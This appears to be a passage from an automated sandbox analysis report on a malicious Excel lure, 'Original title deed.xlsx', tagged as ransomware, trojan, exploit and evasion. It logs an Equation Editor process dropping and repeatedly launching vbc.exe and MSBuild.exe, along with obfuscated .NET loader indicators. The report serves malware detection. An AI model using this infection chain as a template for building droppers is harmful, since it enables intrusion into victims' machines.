        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.rans.troj.expl.evad.winXLSX@65/72@1/1
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Original title deed.xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE3AA.tmpJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: unknown unknown
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: Original title deed.xlsxStatic file information: File size 1173504 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.2150153409.0000000003270000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.2167801125.0000000002900000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.2179925246.00000000029C0000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.2191624487.0000000002860000.00000004.00000001.sdmp
        Source: Original title deed.xlsxInitial sample: OLE indicators vbamacros = False
        Source: Original title deed.xlsxInitial sample: OLE indicators encrypted = True

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
